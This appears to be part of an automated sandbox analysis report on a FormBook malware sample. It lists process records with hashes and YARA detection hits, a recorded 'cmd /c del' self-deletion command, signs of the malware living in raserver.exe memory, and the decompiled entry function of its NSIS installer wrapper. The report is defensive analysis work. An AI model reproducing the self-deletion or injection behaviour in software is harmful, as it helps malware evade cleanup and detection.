                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.213421837.0000000002A30000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:low

                                                                                                                        General

                                                                                                                        Start time:09:18:17
                                                                                                                        Start date:23/02/2021
                                                                                                                        Path:C:\Users\user\Desktop\lpdKSOB78u.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:'C:\Users\user\Desktop\lpdKSOB78u.exe'
                                                                                                                        Imagebase:0x7ff7488e0000
                                                                                                                        File size:217653 bytes
                                                                                                                        MD5 hash:F10054D325DF455C58ECB16EA660D3F2
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.265809915.00000000008B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.265809915.00000000008B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.265809915.00000000008B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:low

                                                                                                                        General

                                                                                                                        Start time:09:18:22
                                                                                                                        Start date:23/02/2021
                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:
                                                                                                                        Imagebase:0x7ff714890000
                                                                                                                        File size:3933184 bytes
                                                                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Start time:09:18:43
                                                                                                                        Start date:23/02/2021
                                                                                                                        Path:C:\Windows\SysWOW64\raserver.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\raserver.exe
                                                                                                                        Imagebase:0x1330000
                                                                                                                        File size:108544 bytes
                                                                                                                        MD5 hash:2AADF65E395BFBD0D9B71D7279C8B5EC
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.471203600.0000000000D80000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.471203600.0000000000D80000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.471203600.0000000000D80000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:moderate

                                                                                                                        General

                                                                                                                        Start time:09:18:47
                                                                                                                        Start date:23/02/2021
                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:/c del 'C:\Users\user\Desktop\lpdKSOB78u.exe'
                                                                                                                        Imagebase:0xc50000
                                                                                                                        File size:232960 bytes
                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Start time:09:18:48
                                                                                                                        Start date:23/02/2021
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff6b2800000
                                                                                                                        File size:625664 bytes
                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Disassembly

                                                                                                                        Code Analysis

                                                                                                                          Executed Functions

                                                                                                                          C-Code - Quality: 86%
                                                                                                                          			_entry_() {
                                                                                                                          				signed int _t42;
                                                                                                                          				intOrPtr* _t47;
                                                                                                                          				CHAR* _t51;
                                                                                                                          				char* _t53;
                                                                                                                          				CHAR* _t55;
                                                                                                                          				void* _t59;
                                                                                                                          				intOrPtr _t61;
                                                                                                                          				int _t63;
                                                                                                                          				int _t66;
                                                                                                                          				signed int _t67;
                                                                                                                          				int _t68;
                                                                                                                          				signed int _t70;
                                                                                                                          				void* _t94;
                                                                                                                          				signed int _t110;
                                                                                                                          				void* _t113;
                                                                                                                          				void* _t118;
                                                                                                                          				intOrPtr* _t119;
                                                                                                                          				char _t122;
                                                                                                                          				signed int _t141;
                                                                                                                          				signed int _t142;
                                                                                                                          				int _t150;
                                                                                                                          				void* _t151;
                                                                                                                          				intOrPtr* _t153;
                                                                                                                          				CHAR* _t156;
                                                                                                                          				CHAR* _t157;
                                                                                                                          				void* _t159;
                                                                                                                          				char* _t160;
                                                                                                                          				void* _t163;
                                                                                                                          				void* _t164;
                                                                                                                          				char _t189;
                                                                                                                          
                                                                                                                          				 *(_t164 + 0x18) = 0;
                                                                                                                          				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
                                                                                                                          				 *(_t164 + 0x20) = 0;
                                                                                                                          				 *(_t164 + 0x14) = 0x20;
                                                                                                                          				SetErrorMode(0x8001); // executed
                                                                                                                          				_t42 = GetVersion() & 0xbfffffff;
                                                                                                                          				 *0x42f44c = _t42;
                                                                                                                          				if(_t42 != 6) {
                                                                                                                          					_t119 = E00406656(0);
                                                                                                                          					if(_t119 != 0) {
                                                                                                                          						 *_t119(0xc00);
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				_t156 = "UXTHEME";
                                                                                                                          				do {
                                                                                                                          					E004065E8(_t156); // executed
                                                                                                                          					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
                                                                                                                          				} while ( *_t156 != 0);
                                                                                                                          				E00406656(0xb);
                                                                                                                          				 *0x42f444 = E00406656(9);
                                                                                                                          				_t47 = E00406656(7);
                                                                                                                          				if(_t47 != 0) {
                                                                                                                          					_t47 =  *_t47(0x1e);
                                                                                                                          					if(_t47 != 0) {
                                                                                                                          						 *0x42f44f =  *0x42f44f | 0x00000040;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				__imp__#17(_t159);
                                                                                                                          				__imp__OleInitialize(0); // executed
                                                                                                                          				 *0x42f518 = _t47;
                                                                                                                          				SHGetFileInfoA(0x429878, 0, _t164 + 0x38, 0x160, 0); // executed
                                                                                                                          				E0040624D("Setup Setup", "NSIS Error");
                                                                                                                          				_t51 = GetCommandLineA();
                                                                                                                          				_t160 = "\"C:\\Users\\hardz\\Desktop\\lpdKSOB78u.exe\" ";
                                                                                                                          				E0040624D(_t160, _t51);
                                                                                                                          				 *0x42f440 = 0x400000;
                                                                                                                          				_t53 = _t160;
                                                                                                                          				if("\"C:\\Users\\hardz\\Desktop\\lpdKSOB78u.exe\" " == 0x22) {
                                                                                                                          					 *(_t164 + 0x14) = 0x22;
                                                                                                                          					_t53 =  &M00435001;
                                                                                                                          				}
                                                                                                                          				_t55 = CharNextA(E00405C10(_t53,  *(_t164 + 0x14)));
                                                                                                                          				 *(_t164 + 0x1c) = _t55;
                                                                                                                          				while(1) {
                                                                                                                          					_t122 =  *_t55;
                                                                                                                          					_t172 = _t122;
                                                                                                                          					if(_t122 == 0) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					__eflags = _t122 - 0x20;
                                                                                                                          					if(_t122 != 0x20) {
                                                                                                                          						L13:
                                                                                                                          						__eflags =  *_t55 - 0x22;
                                                                                                                          						 *(_t164 + 0x14) = 0x20;
                                                                                                                          						if( *_t55 == 0x22) {
                                                                                                                          							_t55 =  &(_t55[1]);
                                                                                                                          							__eflags = _t55;
                                                                                                                          							 *(_t164 + 0x14) = 0x22;
                                                                                                                          						}
                                                                                                                          						__eflags =  *_t55 - 0x2f;
                                                                                                                          						if( *_t55 != 0x2f) {
                                                                                                                          							L25:
                                                                                                                          							_t55 = E00405C10(_t55,  *(_t164 + 0x14));
                                                                                                                          							__eflags =  *_t55 - 0x22;
                                                                                                                          							if(__eflags == 0) {
                                                                                                                          								_t55 =  &(_t55[1]);
                                                                                                                          								__eflags = _t55;
                                                                                                                          							}
                                                                                                                          							continue;
                                                                                                                          						} else {
                                                                                                                          							_t55 =  &(_t55[1]);
                                                                                                                          							__eflags =  *_t55 - 0x53;
                                                                                                                          							if( *_t55 != 0x53) {
                                                                                                                          								L20:
                                                                                                                          								__eflags =  *_t55 - ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC");
                                                                                                                          								if( *_t55 != ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC")) {
                                                                                                                          									L24:
                                                                                                                          									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=");
                                                                                                                          									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=")) {
                                                                                                                          										 *((char*)(_t55 - 2)) = 0;
                                                                                                                          										__eflags =  &(_t55[2]);
                                                                                                                          										E0040624D("C:\\Users\\hardz\\AppData\\Local\\Temp",  &(_t55[2]));
                                                                                                                          										L30:
                                                                                                                          										_t157 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
                                                                                                                          										GetTempPathA(0x400, _t157); // executed
                                                                                                                          										_t59 = E00403455(_t172);
                                                                                                                          										_t173 = _t59;
                                                                                                                          										if(_t59 != 0) {
                                                                                                                          											L33:
                                                                                                                          											DeleteFileA("1033"); // executed
                                                                                                                          											_t61 = E00402EF1(_t175,  *(_t164 + 0x20)); // executed
                                                                                                                          											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
                                                                                                                          											if(_t61 != 0) {
                                                                                                                          												L43:
                                                                                                                          												E0040396E();
                                                                                                                          												__imp__OleUninitialize();
                                                                                                                          												_t185 =  *((intOrPtr*)(_t164 + 0x10));
                                                                                                                          												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
                                                                                                                          													__eflags =  *0x42f4f4;
                                                                                                                          													if( *0x42f4f4 == 0) {
                                                                                                                          														L67:
                                                                                                                          														_t63 =  *0x42f50c;
                                                                                                                          														__eflags = _t63 - 0xffffffff;
                                                                                                                          														if(_t63 != 0xffffffff) {
                                                                                                                          															 *(_t164 + 0x14) = _t63;
                                                                                                                          														}
                                                                                                                          														ExitProcess( *(_t164 + 0x14));
                                                                                                                          													}
                                                                                                                          													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
                                                                                                                          													__eflags = _t66;
                                                                                                                          													_t150 = 2;
                                                                                                                          													if(_t66 != 0) {
                                                                                                                          														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
                                                                                                                          														 *(_t164 + 0x38) = 1;
                                                                                                                          														 *(_t164 + 0x44) = _t150;
                                                                                                                          														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
                                                                                                                          													}
                                                                                                                          													_t67 = E00406656(4);
                                                                                                                          													__eflags = _t67;
                                                                                                                          													if(_t67 == 0) {
                                                                                                                          														L65:
                                                                                                                          														_t68 = ExitWindowsEx(_t150, 0x80040002);
                                                                                                                          														__eflags = _t68;
                                                                                                                          														if(_t68 != 0) {
                                                                                                                          															goto L67;
                                                                                                                          														}
                                                                                                                          														goto L66;
                                                                                                                          													} else {
                                                                                                                          														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
                                                                                                                          														__eflags = _t70;
                                                                                                                          														if(_t70 == 0) {
                                                                                                                          															L66:
                                                                                                                          															E0040140B(9);
                                                                                                                          															goto L67;
                                                                                                                          														}
                                                                                                                          														goto L65;
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          												E00405969( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
                                                                                                                          												ExitProcess(2);
                                                                                                                          											}
                                                                                                                          											if( *0x42f460 == 0) {
                                                                                                                          												L42:
                                                                                                                          												 *0x42f50c =  *0x42f50c | 0xffffffff;
                                                                                                                          												 *(_t164 + 0x18) = E00403A60( *0x42f50c);
                                                                                                                          												goto L43;
                                                                                                                          											}
                                                                                                                          											_t153 = E00405C10(_t160, 0);
                                                                                                                          											if(_t153 < _t160) {
                                                                                                                          												L39:
                                                                                                                          												_t182 = _t153 - _t160;
                                                                                                                          												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
                                                                                                                          												if(_t153 < _t160) {
                                                                                                                          													_t151 = E004058D4(_t185);
                                                                                                                          													lstrcatA(_t157, "~nsu");
                                                                                                                          													if(_t151 != 0) {
                                                                                                                          														lstrcatA(_t157, "A");
                                                                                                                          													}
                                                                                                                          													lstrcatA(_t157, ".tmp");
                                                                                                                          													_t162 = "C:\\Users\\hardz\\Desktop";
                                                                                                                          													if(lstrcmpiA(_t157, "C:\\Users\\hardz\\Desktop") != 0) {
                                                                                                                          														_push(_t157);
                                                                                                                          														if(_t151 == 0) {
                                                                                                                          															E004058B7();
                                                                                                                          														} else {
                                                                                                                          															E0040583A();
                                                                                                                          														}
                                                                                                                          														SetCurrentDirectoryA(_t157);
                                                                                                                          														_t189 = "C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
                                                                                                                          														if(_t189 == 0) {
                                                                                                                          															E0040624D("C:\\Users\\hardz\\AppData\\Local\\Temp", _t162);
                                                                                                                          														}
                                                                                                                          														E0040624D(0x430000,  *(_t164 + 0x1c));
                                                                                                                          														_t137 = "A";
                                                                                                                          														_t163 = 0x1a;
                                                                                                                          														 *0x430400 = "A";
                                                                                                                          														do {
                                                                                                                          															E004062E0(0, 0x429478, _t157, 0x429478,  *((intOrPtr*)( *0x42f454 + 0x120)));
                                                                                                                          															DeleteFileA(0x429478);
                                                                                                                          															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\hardz\\Desktop\\lpdKSOB78u.exe", 0x429478, 1) != 0) {
                                                                                                                          																E0040602C(_t137, 0x429478, 0);
                                                                                                                          																E004062E0(0, 0x429478, _t157, 0x429478,  *((intOrPtr*)( *0x42f454 + 0x124)));
                                                                                                                          																_t94 = E004058EC(0x429478);
                                                                                                                          																if(_t94 != 0) {
                                                                                                                          																	CloseHandle(_t94);
                                                                                                                          																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
                                                                                                                          																}
                                                                                                                          															}
                                                                                                                          															 *0x430400 =  *0x430400 + 1;
                                                                                                                          															_t163 = _t163 - 1;
                                                                                                                          														} while (_t163 != 0);
                                                                                                                          														E0040602C(_t137, _t157, 0);
                                                                                                                          													}
                                                                                                                          													goto L43;
                                                                                                                          												}
                                                                                                                          												 *_t153 = 0;
                                                                                                                          												_t154 = _t153 + 4;
                                                                                                                          												if(E00405CD3(_t182, _t153 + 4) == 0) {
                                                                                                                          													goto L43;
                                                                                                                          												}
                                                                                                                          												E0040624D("C:\\Users\\hardz\\AppData\\Local\\Temp", _t154);
                                                                                                                          												E0040624D("C:\\Users\\hardz\\AppData\\Local\\Temp", _t154);
                                                                                                                          												 *((intOrPtr*)(_t164 + 0x10)) = 0;
                                                                                                                          												goto L42;
                                                                                                                          											}
                                                                                                                          											_t110 = (( *0x40a1bf << 0x00000008 |  *0x40a1be) << 0x00000008 |  *0x40a1bd) << 0x00000008 | " _?=";
                                                                                                                          											while( *_t153 != _t110) {
                                                                                                                          												_t153 = _t153 - 1;
                                                                                                                          												if(_t153 >= _t160) {
                                                                                                                          													continue;
                                                                                                                          												}
                                                                                                                          												goto L39;
                                                                                                                          											}
                                                                                                                          											goto L39;
                                                                                                                          										}
                                                                                                                          										GetWindowsDirectoryA(_t157, 0x3fb);
                                                                                                                          										lstrcatA(_t157, "\\Temp");
                                                                                                                          										_t113 = E00403455(_t173);
                                                                                                                          										_t174 = _t113;
                                                                                                                          										if(_t113 != 0) {
                                                                                                                          											goto L33;
                                                                                                                          										}
                                                                                                                          										GetTempPathA(0x3fc, _t157);
                                                                                                                          										lstrcatA(_t157, "Low");
                                                                                                                          										SetEnvironmentVariableA("TEMP", _t157);
                                                                                                                          										SetEnvironmentVariableA("TMP", _t157);
                                                                                                                          										_t118 = E00403455(_t174);
                                                                                                                          										_t175 = _t118;
                                                                                                                          										if(_t118 == 0) {
                                                                                                                          											goto L43;
                                                                                                                          										}
                                                                                                                          										goto L33;
                                                                                                                          									}
                                                                                                                          									goto L25;
                                                                                                                          								}
                                                                                                                          								_t141 = _t55[4];
                                                                                                                          								__eflags = _t141 - 0x20;
                                                                                                                          								if(_t141 == 0x20) {
                                                                                                                          									L23:
                                                                                                                          									_t15 = _t164 + 0x20;
                                                                                                                          									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
                                                                                                                          									__eflags =  *_t15;
                                                                                                                          									goto L24;
                                                                                                                          								}
                                                                                                                          								__eflags = _t141;
                                                                                                                          								if(_t141 != 0) {
                                                                                                                          									goto L24;
                                                                                                                          								}
                                                                                                                          								goto L23;
                                                                                                                          							}
                                                                                                                          							_t142 = _t55[1];
                                                                                                                          							__eflags = _t142 - 0x20;
                                                                                                                          							if(_t142 == 0x20) {
                                                                                                                          								L19:
                                                                                                                          								 *0x42f500 = 1;
                                                                                                                          								goto L20;
                                                                                                                          							}
                                                                                                                          							__eflags = _t142;
                                                                                                                          							if(_t142 != 0) {
                                                                                                                          								goto L20;
                                                                                                                          							}
                                                                                                                          							goto L19;
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						goto L12;
                                                                                                                          					}
                                                                                                                          					do {
                                                                                                                          						L12:
                                                                                                                          						_t55 =  &(_t55[1]);
                                                                                                                          						__eflags =  *_t55 - 0x20;
                                                                                                                          					} while ( *_t55 == 0x20);
                                                                                                                          					goto L13;
                                                                                                                          				}
                                                                                                                          				goto L30;
                                                                                                                          			}

































                                                                                                                          0x00403721
                                                                                                                          0x00403725
                                                                                                                          0x0040375b
                                                                                                                          0x0040375b
                                                                                                                          0x0040375d
                                                                                                                          0x00403765
                                                                                                                          0x004037d7
                                                                                                                          0x004037d9
                                                                                                                          0x004037e0
                                                                                                                          0x004037e8
                                                                                                                          0x004037e8
                                                                                                                          0x004037f3
                                                                                                                          0x004037f8
                                                                                                                          0x00403807
                                                                                                                          0x0040380b
                                                                                                                          0x0040380c
                                                                                                                          0x00403815
                                                                                                                          0x0040380e
                                                                                                                          0x0040380e
                                                                                                                          0x0040380e
                                                                                                                          0x0040381b
                                                                                                                          0x00403821
                                                                                                                          0x00403827
                                                                                                                          0x0040382f
                                                                                                                          0x0040382f
                                                                                                                          0x0040383d
                                                                                                                          0x00403842
                                                                                                                          0x00403854
                                                                                                                          0x0040385c
                                                                                                                          0x00403862
                                                                                                                          0x0040386e
                                                                                                                          0x00403874
                                                                                                                          0x0040387e
                                                                                                                          0x00403894
                                                                                                                          0x004038a5
                                                                                                                          0x004038ab
                                                                                                                          0x004038b2
                                                                                                                          0x004038b5
                                                                                                                          0x004038bb
                                                                                                                          0x004038bb
                                                                                                                          0x004038b2
                                                                                                                          0x004038bf
                                                                                                                          0x004038c5
                                                                                                                          0x004038c5
                                                                                                                          0x004038ca
                                                                                                                          0x004038ca
                                                                                                                          0x00000000
                                                                                                                          0x00403807
                                                                                                                          0x00403767
                                                                                                                          0x00403769
                                                                                                                          0x00403774
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040377c
                                                                                                                          0x00403787
                                                                                                                          0x0040378c
                                                                                                                          0x00000000
                                                                                                                          0x0040378c
                                                                                                                          0x00403750
                                                                                                                          0x00403752
                                                                                                                          0x00403756
                                                                                                                          0x00403759
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403759
                                                                                                                          0x00000000
                                                                                                                          0x00403752
                                                                                                                          0x004036a2
                                                                                                                          0x004036ae
                                                                                                                          0x004036b3
                                                                                                                          0x004036b8
                                                                                                                          0x004036ba
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004036c2
                                                                                                                          0x004036ca
                                                                                                                          0x004036db
                                                                                                                          0x004036e3
                                                                                                                          0x004036e5
                                                                                                                          0x004036ea
                                                                                                                          0x004036ec
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004036ec
                                                                                                                          0x00000000
                                                                                                                          0x00403651
                                                                                                                          0x00403612
                                                                                                                          0x00403615
                                                                                                                          0x00403618
                                                                                                                          0x0040361e
                                                                                                                          0x0040361e
                                                                                                                          0x0040361e
                                                                                                                          0x0040361e
                                                                                                                          0x00000000
                                                                                                                          0x0040361e
                                                                                                                          0x0040361a
                                                                                                                          0x0040361c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040361c
                                                                                                                          0x004035cd
                                                                                                                          0x004035d0
                                                                                                                          0x004035d3
                                                                                                                          0x004035d9
                                                                                                                          0x004035d9
                                                                                                                          0x00000000
                                                                                                                          0x004035d9
                                                                                                                          0x004035d5
                                                                                                                          0x004035d7
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004035d7
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004035a8
                                                                                                                          0x004035a8
                                                                                                                          0x004035a8
                                                                                                                          0x004035a9
                                                                                                                          0x004035a9
                                                                                                                          0x00000000
                                                                                                                          0x004035a8
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • SetErrorMode.KERNELBASE ref: 004034AB
                                                                                                                          • GetVersion.KERNEL32 ref: 004034B1
                                                                                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034E4
                                                                                                                          • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 00403520
                                                                                                                          • OleInitialize.OLE32(00000000), ref: 00403527
                                                                                                                          • SHGetFileInfoA.SHELL32(00429878,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403543
                                                                                                                          • GetCommandLineA.KERNEL32(Setup Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00403558
                                                                                                                          • CharNextA.USER32(00000000,"C:\Users\user\Desktop\lpdKSOB78u.exe" ,00000020,"C:\Users\user\Desktop\lpdKSOB78u.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00403594
                                                                                                                          • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403691
                                                                                                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 004036A2
                                                                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 004036AE
                                                                                                                          • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 004036C2
                                                                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036CA
                                                                                                                          • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036DB
                                                                                                                          • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036E3
                                                                                                                          • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004036F7
                                                                                                                            • Part of subcall function 00406656: GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
                                                                                                                            • Part of subcall function 00406656: GetProcAddress.KERNEL32(00000000,?), ref: 00406683
                                                                                                                            • Part of subcall function 00403A60: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,74B5FA90), ref: 00403B50
                                                                                                                            • Part of subcall function 00403A60: lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000), ref: 00403B63
                                                                                                                            • Part of subcall function 00403A60: GetFileAttributesA.KERNEL32(Call), ref: 00403B6E
                                                                                                                            • Part of subcall function 00403A60: LoadImageA.USER32 ref: 00403BB7
                                                                                                                            • Part of subcall function 00403A60: RegisterClassA.USER32 ref: 00403BF4
                                                                                                                            • Part of subcall function 0040396E: CloseHandle.KERNEL32(000002BC,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403980
                                                                                                                            • Part of subcall function 0040396E: CloseHandle.KERNEL32(000002B4,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403994
                                                                                                                          • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 004037A5
                                                                                                                          • ExitProcess.KERNEL32 ref: 004037C6
                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004038E3
                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004038EA
                                                                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403902
                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403921
                                                                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403945
                                                                                                                          • ExitProcess.KERNEL32 ref: 00403968
                                                                                                                            • Part of subcall function 00405969: MessageBoxIndirectA.USER32(0040A230), ref: 004059C4
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
